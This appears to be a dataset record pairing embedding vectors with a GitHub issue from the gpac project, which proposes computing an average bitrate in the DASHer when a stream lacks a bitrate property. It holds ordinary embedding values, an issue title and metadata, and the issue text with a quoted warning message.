0.0015300068771466613, -0.001634153421036899, -0.004336282145231962, -0.004957373719662428, -0.0166634414345026, -0.006422999314963818, 0.007566717453300953, -0.006555549334734678, 0.012338520959019661, -0.020829301327466965, -0.02431347593665123, -0.006025349255651236, -0.0178450308740139, 0.02852478250861168, 0.015156157314777374, -0.015921160578727722, 0.017360275611281395, 0.006366192363202572, 0.011785597540438175, -0.006074581760913134, -0.006097304634749889, 0.02525268867611885, -0.00030581202008761466, 0.005949606187641621, -0.006063220556825399, 0.009892025031149387, -0.010846385732293129, -0.03241796791553497, -0.0022419902961701155, -0.01569393277168274, -0.014838037081062794, -0.00929365586489439, -0.038840968161821365, 0.02420743554830551, 0.010316185653209686, 0.010869108140468597, -0.015648486092686653, -0.03329658508300781, 0.004855121020227671, -0.0023044783156365156, -0.015603041276335716, 0.0036678507458418608, -0.019284145906567574, -0.007839391939342022, 0.01035405695438385, 0.0025070905685424805, 0.0011418245267122984, -0.00016036196029745042, 0.008096917532384396, -0.017693545669317245, -0.003923483192920685, 0.007983303628861904, -0.004665763583034277, -0.0008435867493972182, -0.022586537525057793, -0.01649680733680725, 0.0077939461916685104, -0.0056049758568406105, -0.008157512173056602, 0.00622228067368269, 0.03359955921769142, -0.02596467174589634, -0.00885434728115797, 0.01720879040658474, -0.003957567270845175, 0.0363566018640995, -0.024843676015734673, -0.00998291652649641, -0.018041962757706642, 0.026646358892321587, 0.0012885764008387923, -0.011793171986937523, -0.006237429101020098, 0.008172661066055298, 0.004631679505109787, -0.013565556146204472, -0.002721064258366823, -0.003480386920273304, 0.0039045473095029593, -0.009558755904436111, -0.000017234471670235507, 0.0138912508264184, 0.011323565617203712, -0.01554244663566351, 0.019102362915873528, 0.0011418245267122984, 0.028570227324962616, 0.006707035470753908, -0.019814347848296165, -0.03353896364569664, -0.003832591697573662, 0.012527878396213055, -0.03175143152475357, 0.0022438839077949524, 0.003192564006894827, 0.00794543232768774, -0.00453700078651309, -0.004673338029533625, 0.005885224789381027, -0.0004414391878526658, -0.004707422107458115, -0.03323599323630333, -0.001732619246467948, 0.010778216645121574, 0.009081576019525528, 0.025267837569117546, -0.010164699517190456, -0.010141976177692413, 0.005707228556275368, 0.04717268794775009, 0.01993553526699543, -0.00565799605101347, -0.02613130584359169, 0.000286166206933558, 0.01872364990413189, -0.007494761608541012, 0.002101865829899907, -0.006120027508586645, 0.0028403594624251127, 0.007472038734704256, -0.01889028400182724, -0.015194029547274113, 0.004309772048145533, -0.016102943569421768, 0.018102556467056274, -0.024298327043652534, 0.011149357073009014, -0.008710435591638088, 0.014497194439172745, 0.008907366544008255, 0.021707920357584953, -0.02902468480169773, -0.009323952719569206, 0.0023063719272613525, -0.0005174187826924026, -0.0003202505176886916, -0.0005003766273148358, -0.018769094720482826, 0.005476213060319424, 0.006703248247504234, 0.017299681901931763, -0.017360275611281395, -0.005453490186482668, 0.013005059212446213, 0.009536033496260643, -0.003171734744682908, 0.006207132246345282, -0.0005226260982453823, 0.002298797480762005, 0.0034368347842246294, -0.013557981699705124, -0.02054147981107235, -0.008793752640485764, 0.0031130339484661818, 0.012368818745017052, -0.006127601955085993, 0.0175117626786232, 0.011149357073009014, -0.013194415718317032, 0.014027588069438934, -0.017663247883319855, 0.004283261951059103, 0.029085280373692513, 0.0017780649941414595, -0.031266674399375916, 0.007612163200974464, 0.012376392260193825, 0.0028630823362618685, 0.018208596855401993, 0.0037000414449721575, -0.010990297421813011, 0.0010613476624712348, -0.0007138769724406302, 0.01207342091947794, -0.023465154692530632, 0.00675248121842742, 0.002088611014187336, -0.017829881981015205, -0.020465735346078873, 0.0024767934810370207, -0.01916295848786831, 0.013285307213664055, -0.0045104906894266605, -0.013141396455466747, -0.0070062195882201195, -0.0007148237782530487, -0.013255010358989239, 0.0010471458081156015, -0.007646247278898954, 0.00039362648385576904, -0.004737719427794218, 0.01042222511023283, 0.03356926143169403, -0.029236765578389168, -0.002438921947032213, -0.00870286114513874, -0.0029634416569024324, -0.005892798770219088, -0.01010410487651825, 0.009740538895130157, -0.010179848410189152, 0.017269384115934372, 0.021253462880849838, 0.006832011044025421, 0.004461257718503475, -0.010861534625291824, -0.014179074205458164, -0.0037132964935153723, -0.018057111650705338, 0.004752867855131626, 0.002105653053149581, 0.004673338029533625, -0.0013397028669714928, -0.004714996553957462, -0.012376392260193825, 0.013944271020591259, -0.0032569454051554203, -0.006131389178335667, 0.018950877711176872, -0.0032285419292747974, 0.0003524412459228188, 0.004828610923141241, 0.01643621362745762, 0.0059117344208061695, -0.0017742777708917856, 0.0195265244692564, -0.004616530612111092, -0.006612356752157211, 0.01808740943670273, 0.014845611527562141, -0.03441758081316948, -0.0057716104201972485, -0.029115576297044754, 0.01292931567877531, -0.003823123639449477, 0.012936890125274658, -0.004821036476641893, -0.0034160055220127106, -0.0035940012894570827, -0.03408431261777878, -0.002811955753713846, 0.029918452724814415, 0.0058625019155442715, 0.007214512676000595, -0.003815549425780773, 0.009876876138150692, 0.009361824952065945, -0.011497775092720985, 0.03447817638516426, 0.011293268762528896, -0.013141396455466747, -0.003103566123172641, -0.009384547360241413, -0.00421888055279851, 0.004059820435941219, -0.03784115985035896, 0.008354444056749344, -0.01589086465537548, 0.027858244255185127, 0.013785210438072681, 0.011618963442742825, 0.007854540832340717, -0.01767839677631855, -0.009217913262546062, -0.0014845611294731498, 0.011558368802070618, 0.017299681901931763, 0.008725583553314209, -0.010800939984619617, 0.016996709629893303, -0.0020374844316393137, -0.00047670697676949203, 0.017799586057662964, 0.005449702963232994, -0.0013425431679934263, -0.004654402378946543, -0.018511569127440453, 0.0316605381667614, 0.019481077790260315, 0.008051471784710884, 0.005453490186482668, 0.01539096049964428, -0.010785791091620922, 0.018905432894825935, -0.008725583553314209, 0.0017543953144922853, -0.004305984824895859, -0.023798424750566483, 0.00635483069345355, -0.00956633035093546, -0.04199187457561493, 0.01999613083899021, 0.010884257033467293, -0.02043543942272663, 0.02276832051575184, 0.011929509229958057, -0.0007451209239661694, -0.009301230311393738, 0.016981562599539757, -0.020859599113464355, 0.0069153280928730965, 0.0019446994410827756, -0.029994195327162743, 0.02461644820868969, -0.010399502702057362, 0.0016180580714717507, 0.011982529424130917, -0.013217139057815075, 0.02494971640408039, -0.009354250505566597, 0.00688503123819828, -0.006369979120790958, 0.003836378687992692, -0.007657608948647976, -0.014277540147304535, 0.011687131598591805, -0.0016871734987944365, 0.0050406912341713905, 0.009081576019525528, -0.0026756185106933117, 0.014338133856654167, 0.01949622668325901, -0.008369592018425465, 0.013065652921795845, -0.01404273696243763, 0.011664409190416336, 0.015572743490338326, -0.01748146489262581, 0.008725583553314209, -0.007937857881188393, -0.013315604999661446, -0.010164699517190456, -0.009892025031149387, 0.014625957235693932, -0.012285500764846802, -0.006063220556825399, 0.00043173463200218976, -0.011588666588068008, -0.023283371701836586, 0.0158302690833807, -0.006479806732386351, 0.002391582587733865, -0.012618769891560078, 0.005741313099861145, -0.018102556467056274, 0.005593614187091589, 0.018375230953097343, -0.011399309150874615, 0.01817830093204975, 0.0007152971811592579, 0.009248210117220879, 0.001558410469442606, 0.02191999927163124, 0.018875135108828545, 0.02610100992023945, 0.003111140336841345, -0.008028749376535416, 0.026752397418022156, 0.0034860677551478148, -0.019980981945991516, -0.010467670857906342, -0.0031660539098083973, 0.010982722975313663, -0.039143938571214676, 0.015360663644969463, -0.024661893025040627, 0.0014069246826693416, 0.0004861748602706939, 0.01861760951578617, 0.005279281176626682, 0.005252771079540253, 0.00009041810699272901, 0.011073614470660686, -0.015368238091468811, 0.010664602741599083, -0.020389992743730545, -0.004347643349319696, -0.003807975212112069, -0.01599690318107605, 0.006305597722530365, 0.009081576019525528, -0.0059685418382287025, -0.0013094056630507112, -0.0015981754986569285, -0.021026233211159706, -0.00838474091142416, -0.0007257118122652173, 0.01345194224268198, -0.01426239125430584, 0.019723456352949142, -0.015012246556580067, 0.007998451590538025, 0.006120027508586645, 0.013118673115968704, 0.009104298427700996, 0.008293849416077137, -0.015466704033315182, 0.01657254993915558, -0.012921741232275963, 0.016118092462420464, -0.010763068683445454, 0.033084504306316376, 0.030448652803897858, -0.018360083922743797, -0.000796720793005079, -0.00563148595392704, -0.02949429117143154, -0.0158302690833807, 0.008945238776504993, -0.023525750264525414, -0.0038742502219974995, -0.005661782808601856, -0.013012632727622986, -0.0008194436668418348, 0.010187421925365925, -0.011831043288111687, -0.012187035754323006, -0.01787532866001129, -0.004821036476641893, 0.004124201834201813, -0.01704215630888939, -0.012899018824100494, -0.007877263240516186, 0.003184989560395479, 0.0013832550030201674, -0.0028592951130121946, -0.014542640186846256, 0.01649680733680725, -0.007017581257969141, -0.014853185974061489, -0.03575065732002258, 0.014883482828736305, 0.00998291652649641, 0.008521078154444695, -0.00038179164403118193, 0.005957180168479681, -0.0008066620794124901, -0.007248597219586372, 0.011937083676457405, -0.002635853597894311, -0.0076273116283118725, -0.018875135108828545, -0.025919226929545403, -0.00528685562312603, 0.0025260262191295624, -0.0035012164153158665, -0.000885718734934926, -0.012194609269499779, 0.0016000691102817655, 0.024131692945957184, 0.019041769206523895, 0.014853185974061489, -0.014035162515938282, 0.02067781612277031, -0.022601686418056488, 0.012891444377601147, -0.0015830269549041986, -0.0032948169391602278, -0.00421888055279851, 0.012899018824100494, -0.00826355256140232, 0.0038856116589158773, 0.00956633035093546, 0.035538576543331146, 0.012217332608997822, 0.02043543942272663, 0.007051665335893631, 0.012043124064803123, -0.02023850753903389, 0.012096144258975983, -0.005355024244636297, 0.011846192181110382, 0.008763455785810947, 0.018299488350749016, -0.015163731761276722, 0.012974761426448822, 0.014550214633345604, 0.0011067934101447463, -0.006953199859708548, -0.023313669487833977, -0.004302197601646185, -0.0019996128976345062, -0.017890477553009987, -0.011793171986937523, 0.0013283414300531149, -0.010997871868312359, -0.010604008100926876, -0.005230048205703497, 0.002558216918259859, 0.02411654405295849, -0.004491555038839579, 0.014830462634563446, 0.01605749875307083, 0.0471423901617527, -0.004612743854522705, -0.004359005019068718, -0.017148196697235107, 0.003912121523171663, 0.012005251832306385, 0.009013406932353973, -0.027873393148183823, 0.0012270353036001325, 0.003635660046711564, 0.01566363498568535, -0.004116627387702465, -0.0073357014916837215, -0.008627118542790413, 0.010550987906754017, 0.02549506537616253, 0.007233448326587677, 0.001365266041830182, 0.009210338816046715, 0.018602460622787476, 0.004010587465018034, 0.025601105764508247, -0.007801520638167858, -0.008187809027731419, -0.0025657913647592068, 0.015603041276335716, 0.014095757156610489, -0.00103294407017529, 0.03665957227349281, 0.014459323137998581, 0.01935989037156105, -0.011035743169486523, 0.016542252153158188, -0.032508861273527145, -0.012421838007867336, 0.01572422869503498, 0.004548361990600824, 0.011732577346265316, 0.03684135526418686, 0.007112259976565838, -0.0034273669589310884, -0.01575452648103237, 0.00007810988608980551, -0.009119447320699692, 0.019920386373996735, 0.015648486092686653, -0.020162764936685562, -0.010816088877618313, 0.0060442849062383175, 0.019072066992521286, -0.009134596213698387, -0.0076273116283118725, -0.004188583232462406, -0.021162571385502815, -0.0016833862755447626, 0.03656867891550064, -0.004809675272554159, -0.0038041879888623953, -0.011119060218334198, 0.010611582547426224, 0.004737719427794218, -0.024237733334302902, 0.017329979687929153, 0.0008487940649501979, 0.006672950927168131, 0.0029426123946905136, -0.008793752640485764, 0.02216237783432007, 0.009369398467242718, 0.015875715762376785, 0.000043966396333416924, 0.0414162278175354, 0.02616160362958908, -0.0011200483422726393, 0.007922708988189697, 0.005097498185932636, -0.012406690046191216, 0.014020013622939587, 0.012383966706693172, 0.0018954664701595902, 0.006631292402744293, 0.006188196130096912, -0.02505575679242611, -0.02525268867611885, -0.0011645474005490541, 0.004446109291166067, 0.011823468841612339, -0.00544591573998332, -0.0026282791513949633, -0.008558949455618858, -0.0009065480553545058, -0.011846192181110382, 0.0036148307844996452, 0.0018083620816469193, 0.01586056686937809, -0.006188196130096912, -0.010604008100926876, 0.001871796790510416, 0.015557595528662205, -0.0024237732868641615, -0.010384353809058666, 0.0021378437522798777, -0.010747919790446758, -0.008642266504466534, 0.008793752640485764, -0.008430186659097672, 0.024161990731954575, -0.009801133535802364, -0.014179074205458164, 0.006593421101570129, 0.008566523902118206, 0.012270352803170681, 0.005309578496962786, 0.0014012439642101526, 0.004241603426635265, 0.0237378291785717, -0.00885434728115797, 0.0032417967449873686, 0.029070131480693817, -0.004544575233012438, -0.0033459432888776064, 0.007721990346908569, -0.00828627496957779, 0.0003155165759380907, -0.0009770835749804974, 0.0001392959529766813, -0.010414650663733482, 0.01308080181479454, 0.002838465850800276, 0.012838424183428288, 0.023328818380832672, 0.0003041551390197128, 0.015557595528662205, -0.013171693310141563, 0.008899793028831482, 0.012285500764846802, -0.01404273696243763, 0.015443980693817139, 0.011990103870630264, -0.00036593296681530774, 0.008157512173056602, -0.017602654173970222, -0.011838617734611034, -0.005699654575437307, 0.01072519738227129, 0.003645127872005105, -0.002105653053149581, -0.009422418661415577, 0.00435143057256937, 0.02354089915752411, -0.002635853597894311, 0.007275107316672802, 0.0005131582729518414, 0.02216237783432007, -0.023919612169265747, -0.00344251561909914, -0.009020981378853321, 0.006570698227733374, 0.02117772027850151, -0.013929122127592564, 0.004582446534186602, -0.013179267756640911, 0.01180074643343687, 0.02643427811563015, -0.007392508443444967, 0.013073227368295193, 0.005324726924300194, -0.004514277912676334, 0.010543414391577244, -0.006487380713224411, -0.011346288956701756, 0.0033667725510895252, -0.012747532688081264, 0.016693739220499992, -0.014838037081062794, 0.013088376261293888, 0.019102362915873528, -0.004737719427794218, -0.009384547360241413, 0.0026661506853997707, -0.01249000709503889, -0.015201603062450886, 0.005142943933606148, -0.024192288517951965, 0.0030751624144613743, 0.007801520638167858, 0.015678783878684044, 0.009505735710263252, 0.005756461527198553, 0.054565198719501495, -0.005392895545810461, 0.0071539185009896755, 0.006767629645764828, -0.014345708303153515, 0.00011864418047480285, -0.009604201652109623, -0.008210532367229462, -0.02073840983211994, -0.01878424361348152, 0.0032209674827754498, 0.0036205113865435123, 0.0019731030333787203, 0.004995245486497879, -0.008808901533484459, -0.00366216991096735, -0.003077056026086211, 0.010005638934671879, -0.0158302690833807, -0.013868528418242931, -0.007100898306816816, 0.011785597540438175, 0.026540318503975868, 0.010694899596273899, 0.016390766948461533, 0.002739999908953905, -0.011497775092720985, 0.02747952938079834, 0.0057867588475346565, -0.010225294157862663, 0.012255203910171986, 0.000007714830644545145, -0.006396489217877388, 0.005957180168479681, 0.01619383506476879, 0.013406496495008469, -0.010702474042773247, 0.021465541794896126, -0.011088763363659382, -0.029070131480693817, 0.03053954429924488, -0.005218687001615763, -0.008748306892812252, 0.014095757156610489, 0.00037895128480158746, 0.004839972592890263, 0.003493641968816519, -0.024798231199383736, 0.020450588315725327, -0.0009221700020134449, -0.007434167433530092, 0.011596240103244781, -0.012868721969425678, -0.007301616948097944, 0.00885434728115797, -0.006479806732386351, -0.004177222028374672, -0.003020248841494322, -0.001684333081357181, 0.007687906268984079, 0.0023859019856899977, -0.007547781802713871, -0.0032967105507850647, -0.01949622668325901, -0.02505575679242611, 0.008907366544008255, -0.012497581541538239, 0.024555854499340057, -0.005279281176626682, 0.019344741478562355, 0.00801360048353672, -0.004680912476032972, -0.0061503248289227486, -0.0071539185009896755, -0.02411654405295849, 0.0015820801490917802, 0.015247048810124397, -0.0003531513502821326, 0.007468251511454582, 0.01126297190785408, 0.004885418340563774, -0.0054231928661465645, -0.0005193123943172395, 0.005283068399876356, 0.012012826278805733, 0.0077939461916685104, -0.010126828216016293, -0.004025735892355442, -0.007010006811469793, 0.03175143152475357, -0.002117014490067959, 0.003111140336841345, -0.011717429384589195, 0.006366192363202572, -0.002546855481341481, 0.011391734704375267, 0.004809675272554159, 0.007676544599235058, -0.009270933456718922, -0.0023120525293052197, -0.016617996618151665, 0.01872364990413189, -0.003037290880456567, 0.011543220840394497, 0.0029009536374360323, -0.02616160362958908, -0.018511569127440453, -0.013171693310141563, -0.02232901193201542, 0.011641685850918293, 0.008112066425383091, -0.0015091776149347425, -0.010217719711363316, 0.007498548831790686, 0.0022476711310446262, -0.003309965366497636, -0.017269384115934372, 0.00312818237580359, 0.015527297742664814, 0.0027684036176651716, -0.012899018824100494, 0.00603671045973897, 0.02337426319718361, -0.01013440266251564, -0.00312818237580359, -0.01831463724374771, -0.0036602765321731567, 0.0210413821041584, 0.005949606187641621, 0.010990297421813011, 0.006585846655070782, -0.003546662162989378, 0.0010253697400912642, -0.013913974165916443, -0.0028763371519744396, 0.025207241997122765, 0.011376585811376572, 0.010611582547426224, 0.010338908061385155, 0.002298797480762005, -0.013156544417142868, 0.055686190724372864, 0.0030638009775429964, -0.00885434728115797, -0.010073808021843433, -0.008498354814946651, 0.007869688794016838, 0.015133434906601906, -0.006858521141111851, -0.01905691809952259, 0.008725583553314209, 0.00973296444863081, 0.020162764936685562, 0.01323228795081377, -0.007400082889944315, -0.0003836852265521884, 0.012118866667151451, 0.025737443938851357, -0.03690195083618164, 0.0037530616391450167, -0.011391734704375267, 0.006654015276581049, 0.005453490186482668, 0.007744713220745325, 0.012164312414824963, 0.016254430636763573, 0.0034311541821807623, -0.00046416206168942153, 0.014315411448478699, -0.021329205483198166, -0.010861534625291824, 0.008611969649791718, -0.015981756150722504, 0.005426980089396238, 0.004427173640578985, 0.009134596213698387, -0.004279474727809429, 0.02367723546922207, 0.0020374844316393137, 0.03450847417116165, 0.01770869456231594, 0.011058465577661991, -0.01566363498568535, 0.0017704906640574336, 0.03811383619904518, -0.012702086940407753, -0.011490200646221638, -0.0073357014916837215, -0.009043704718351364, 0.007650034502148628, 0.00826355256140232, -0.0074606770649552345, 0.009308804757893085, -0.011088763363659382, 0.007203151471912861, 0.018375230953097343, 0.016845224425196648, 0.00581705616787076, 0.00966479629278183, 0.005540594458580017, 0.0027494679670780897, -0.007419018540531397, 0.016102943569421768, 0.02320762909948826 ]
2,096
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
In case the 'btrt' (or equivalent) is missing, GPAC emits this warning: ``` [Dasher] No bitrate property assigned to PID output.mp4, defaulting to 1Mbps Try specifying bitrate property after your source, e.g. -i source.raw:#Bitrate=VAL ``` Since most contents don't contain this information, this is a regression for most users. I propose we recompute a bitrate when missing. @jeanlf proposes to add this in the isobmff demuxer. The bitrate cannot be reliably estimated until a sufficient amount of data is available. This could be an issue with low latency: in this case the manifest is written once one packet for input stream was received.
DASHer: compute average bitrate when no bitrate pid property
https://api.github.com/repos/gpac/gpac/issues/1698/comments
1
2021-03-04T14:55:21
2021-03-05T19:01:11Z
https://github.com/gpac/gpac/issues/1698
822,209,081
1,698
false
This is a GitHub Issue repo:gpac owner:gpac Title : DASHer: compute average bitrate when no bitrate pid property Issue date: --- start body --- In case the 'btrt' (or equivalent) is missing, GPAC emits this warning: ``` [Dasher] No bitrate property assigned to PID output.mp4, defaulting to 1Mbps Try specifying bitrate property after your source, e.g. -i source.raw:#Bitrate=VAL ``` Since most contents don't contain this information, this is a regression for most users. I propose we recompute a bitrate when missing. @jeanlf proposes to add this in the isobmff demuxer. The bitrate cannot be reliably estimated until a sufficient amount of data is available. This could be an issue with low latency: in this case the manifest is written once one packet for input stream was received. --- end body ---
823
[ -0.04947422817349434, 0.007299656979739666, -0.022660963237285614, 0.0017393282614648342, -0.006055439356714487, -0.003392150392755866, -0.0089672040194273, 0.060311440378427505, -0.06090041622519493, 0.01572573557496071, 0.023721124976873398, -0.00813527125865221, 0.029493117704987526, -0.002136889146640897, -0.01967189460992813, 0.021159065887331963, 0.014510967768728733, -0.006180597469210625, 0.0021773814223706722, -0.00012607828830368817, 0.01964244619011879, -0.03719401732087135, -0.00306084961630404, 0.02962563745677471, 0.007708261255174875, 0.022248677909374237, -0.02495798096060753, 0.02330883964896202, -0.029934851452708244, -0.007008848711848259, 0.04420286417007446, 0.019774965941905975, -0.03357179835438728, -0.03257053345441818, 0.018140550702810287, 0.006953631993383169, 0.05333203822374344, 0.050092656165361404, -0.01526927761733532, -0.015328175388276577, -0.032629430294036865, -0.0035504384431988, -0.05209518224000931, 0.01298698503524065, -0.013001709245145321, 0.0042443289421498775, -0.01625581830739975, 0.01468029897660017, -0.025105224922299385, -0.01604967564344406, 0.007870230823755264, -0.056159138679504395, -0.03566267341375351, -0.00436212494969368, -0.027313895523548126, -0.016594480723142624, 0.021262137219309807, -0.00557689368724823, -0.021159065887331963, -0.018508661538362503, -0.006718040443956852, 0.02084985375404358, -0.032364390790462494, 0.04343719407916069, -0.002858388237655163, -0.007244440261274576, -0.028963036835193634, 0.06095931679010391, -0.008120546117424965, 0.015018961392343044, -0.016182195395231247, -0.03469085693359375, 0.012051980942487717, 0.008923030458390713, 0.0203639455139637, -0.05023989826440811, 0.033100612461566925, 0.02451624721288681, 0.013760019093751907, 0.009556182660162449, -0.04055119678378105, 0.024692939594388008, -0.030479658395051956, -0.01176485326141119, 0.010321855545043945, -0.025767827406525612, -0.03324785828590393, -0.043289948254823685, 0.007759796921163797, -0.023956716060638428, 0.029655087739229202, 0.023853644728660583, 0.031893208622932434, 0.011374655179679394, -0.0027203462086617947, 0.06095931679010391, -0.016461960971355438, -0.0051093921065330505, -0.04010946303606033, -0.03003792278468609, -0.03413132578134537, 0.006313117686659098, 0.0075315674766898155, -0.002928329398855567, 0.0475894957780838, -0.0020595856476575136, 0.014812818728387356, -0.019524650648236275, 0.026327356696128845, 0.13628971576690674, 0.006003903690725565, 0.04105182737112045, -0.024604592472314835, -0.012331745587289333, 0.005046812817454338, 0.04099293053150177, -0.02422175742685795, -0.05412716045975685, 0.028462404385209084, 0.04903249442577362, 0.0055179959163069725, -0.009784411638975143, -0.03595716133713722, 0.03569212183356285, 0.014002973213791847, 0.05671866610646248, -0.027785079553723335, -0.01914181374013424, -0.004763366654515266, -0.018435038626194, -0.0308330450206995, -0.000413435569498688, -0.009637166745960712, -0.01868535578250885, -0.002287814859300852, -0.004719193559139967, -0.041375767439603806, 0.007833419367671013, 0.03952048346400261, -0.005473822820931673, 0.013598049990832806, -0.013509703800082207, 0.05038714408874512, 0.02037866972386837, -0.010483824647963047, 0.012213950045406818, -0.0009791774209588766, 0.0029927489813417196, -0.042288683354854584, 0.03881371021270752, 0.013973523862659931, -0.0009069354855455458, -0.0023172637447714806, -0.013399269431829453, -0.011220048181712627, 0.032128799706697464, -0.0298317801207304, 0.005194057710468769, 0.002593347802758217, 0.024619318544864655, 0.003219137666746974, -0.001503736712038517, -0.006905777379870415, 0.016859520226716995, 0.01296489778906107, -0.01937740482389927, -0.016653377562761307, -0.003684799186885357, -0.04493908956646919, 0.01579935848712921, -0.01286918856203556, -0.019539374858140945, 0.005212463438510895, 0.000009174036676995456, -0.022440096363425255, -0.004494645167142153, 0.025164123624563217, 0.01490116585046053, -0.009401575662195683, -0.0004387432709336281, -0.017374876886606216, -0.015387073159217834, -0.01285446435213089, -0.029434220865368843, -0.021144341677427292, -0.0284035075455904, 0.007421134039759636, -0.0157551858574152, 0.02834460884332657, -0.032158248126506805, 0.024457348510622978, 0.05265471339225769, -0.0015966849168762565, -0.008164719678461552, 0.020952923223376274, -0.0298317801207304, -0.035780467092990875, -0.0854608342051506, 0.005455417092889547, -0.026283182203769684, -0.023411910980939865, -0.03740015998482704, 0.0024681896902620792, 0.028462404385209084, -0.020010557025671005, -0.0018322765827178955, 0.028565475717186928, 0.023883095011115074, 0.03925544396042824, -0.030656350776553154, -0.009696065448224545, -0.049650922417640686, 0.021173791959881783, 0.026783814653754234, -0.022749310359358788, -0.005245593376457691, 0.008665352128446102, 0.01368639711290598, -0.008518107235431671, -0.012677771039307117, 0.011551348492503166, -0.02447207272052765, -0.020732056349515915, 0.0006354530341923237, -0.004862756934016943, -0.021689148619771004, 0.01069732941687107, -0.0052161444909870625, -0.004634527489542961, 0.001627054181881249, 0.033630695194005966, 0.012434816919267178, 0.003986651077866554, -0.013215214014053345, -0.007855505682528019, -0.010145161300897598, -0.048414066433906555, 0.002495798049494624, 0.00012550312385428697, 0.0065008546225726604, -0.020702607929706573, 0.0191859882324934, 0.004726555664092302, -0.016064399853348732, -0.016653377562761307, 0.024177582934498787, 0.009320590645074844, 0.006905777379870415, -0.0011061759432777762, -0.009276418015360832, -0.007722985930740833, -0.019774965941905975, 0.03925544396042824, -0.0194363035261631, -0.03489699959754944, 0.005621067248284817, 0.031628165394067764, 0.027696732431650162, 0.028064845129847527, -0.017109837383031845, 0.03784189373254776, -0.003935115411877632, -0.020923474803566933, -0.03848977014422417, -0.007181861437857151, -0.03978552296757698, 0.021188516169786453, -0.004398935940116644, -0.022926002740859985, -0.013509703800082207, -0.0008595410617999732, -0.008746336214244366, -0.04917973652482033, -0.0015350262401625514, -0.036781731992959976, -0.004019781015813351, 0.022734586149454117, -0.00922488234937191, 0.00801747478544712, -0.04043339937925339, -0.01334773376584053, 0.03707621991634369, 0.008282516151666641, 0.009497284889221191, -0.024074511602520943, -0.019848588854074478, -0.0230437982827425, -0.00957090687006712, -0.020437568426132202, 0.0247223898768425, 0.01864118129014969, 0.0240450631827116, -0.043554987758398056, 0.03204045072197914, 0.012434816919267178, -0.011389379389584064, -0.015504869632422924, -0.0006547788507305086, 0.013863090425729752, -0.012427454814314842, -0.015637390315532684, 0.013148954138159752, 0.01675644889473915, -0.004262734670192003, -0.045734211802482605, -0.026518775150179863, -0.015328175388276577, 0.052772507071495056, -0.007605189923197031, -0.02913973107933998, 0.02255789190530777, -0.018096376210451126, 0.006180597469210625, -0.011197960935533047, -0.004317951388657093, 0.021217964589595795, -0.010542722418904305, -0.025664756074547768, -0.022749310359358788, 0.006423551123589277, -0.03130422905087471, 0.002602550433948636, -0.05265471339225769, -0.0052271876484155655, -0.03704677149653435, -0.006154829636216164, -0.02132103592157364, -0.007248121313750744, -0.004159663338214159, -0.007027254439890385, -0.01128630805760622, 0.00909236166626215, 0.02083512768149376, -0.031422022730112076, -0.006718040443956852, -0.05188903957605362, -0.003281716722995043, -0.02644515223801136, 0.00131876056548208, 0.035751018673181534, 0.005495909135788679, 0.012051980942487717, 0.02619483694434166, -0.018523385748267174, 0.021733321249485016, 0.029448945075273514, -0.010513273067772388, 0.0378713421523571, 0.01940685510635376, -0.014599313959479332, 0.0009442067821510136, 0.01644723489880562, 0.02980233170092106, 0.039167094975709915, 0.02669546753168106, 0.00019578947103582323, 0.0060112657956779, -0.03928489238023758, 0.010469099506735802, -0.029021935537457466, 0.01078567560762167, -0.037459056824445724, -0.01346553023904562, 0.05365597829222679, 0.0024939575232565403, 0.04010946303606033, -0.026091765612363815, -0.009151259437203407, -0.012515801936388016, -0.022852381691336632, 0.03148092329502106, 0.023132145404815674, -0.029036659747362137, 0.014128130860626698, -0.055894095450639725, 0.023411910980939865, 0.015225104056298733, 0.003666393691673875, -0.06761477887630463, 0.03495589643716812, -0.04414396733045578, 0.009931656531989574, 0.05221297964453697, -0.045734211802482605, 0.007693536579608917, 0.017551571130752563, -0.00419647479429841, 0.022984901443123817, -0.024899082258343697, -0.006228451617062092, -0.017801886424422264, 0.0004019320767838508, -0.035279836505651474, -0.05023989826440811, -0.01992221176624298, 0.0023706399369984865, -0.023367738351225853, -0.02793232351541519, 0.01235383190214634, -0.009298504330217838, 0.0018764499109238386, -0.01650613360106945, 0.01578463427722454, 0.010984456166625023, -0.006522941403090954, 0.05657142400741577, 0.001995166065171361, -0.018832599744200706, 0.02641570381820202, -0.053979914635419846, -0.018317243084311485, -0.02447207272052765, -0.002847344847396016, -0.0033811070024967194, 0.023426635190844536, 0.003982969559729099, -0.0011890011373907328, 0.021306311711668968, -0.04467405006289482, 0.03077414631843567, 0.015902429819107056, -0.0008972725481726229, -0.016668101772665977, -0.009688702411949635, 0.03619275242090225, 0.008334050886332989, -0.025164123624563217, 0.027814527973532677, 0.03033241257071495, -0.03801858797669411, 0.014378447085618973, -0.046676576137542725, -0.02064371109008789, -0.040904585272073746, 0.040904585272073746, 0.02425120584666729, -0.01674172468483448, 0.00910708587616682, -0.024648766964673996, 0.008606454357504845, -0.018037479370832443, 0.006173234898597002, -0.017315980046987534, 0.019716069102287292, 0.023367738351225853, -0.02547333762049675, 0.010218784213066101, -0.026548223569989204, -0.026283182203769684, -0.03289446979761124, 0.013487616553902626, 0.03324785828590393, 0.007435858715325594, -0.006854241713881493, 0.0036369445733726025, 0.004825945943593979, -0.026827989146113396, -0.018140550702810287, 0.017389601096510887, -0.013848366215825081, -0.01504841074347496, 0.03348344936966896, -0.013679035007953644, 0.022999625653028488, 0.057602137327194214, 0.023956716060638428, -0.02837405912578106, 0.017625194042921066, 0.021777493879199028, 0.004082359839230776, -0.055658504366874695, -0.03545653074979782, 0.021792219951748848, 0.009114447981119156, -0.009114447981119156, 0.03934378921985626, -0.04370223358273506, -0.02835933305323124, 0.0013997451169416308, -0.022175054997205734, -0.013082693330943584, -0.055717404931783676, 0.05409771203994751, -0.017080387100577354, -0.025605857372283936, 0.002981705591082573, -0.018758976832032204, 0.026592396199703217, 0.00839294958859682, 0.012434816919267178, -0.04140521585941315, -0.03274722769856453, 0.02763783372938633, -0.011058079078793526, -0.0004905089735984802, 0.01359068788588047, -0.008466571569442749, 0.023456083610653877, 0.011212686076760292, -0.013642223551869392, 0.0032485867850482464, 0.0016868723323568702, 0.003163920948281884, 0.008326688781380653, 0.020231425762176514, 0.02375057339668274, -0.01456986553966999, 0.017360152676701546, -0.03778299689292908, -0.019951660186052322, -0.01986331306397915, -0.003701364155858755, -0.022852381691336632, -0.022248677909374237, -0.010815124958753586, -0.013502340763807297, -0.011735404841601849, -0.032865021377801895, 0.025856172665953636, 0.004288502503186464, 0.013472892343997955, 0.012545250356197357, -0.0005825369153171778, 0.046087596565485, -0.03368959203362465, 0.040875136852264404, 0.00036074957461096346, 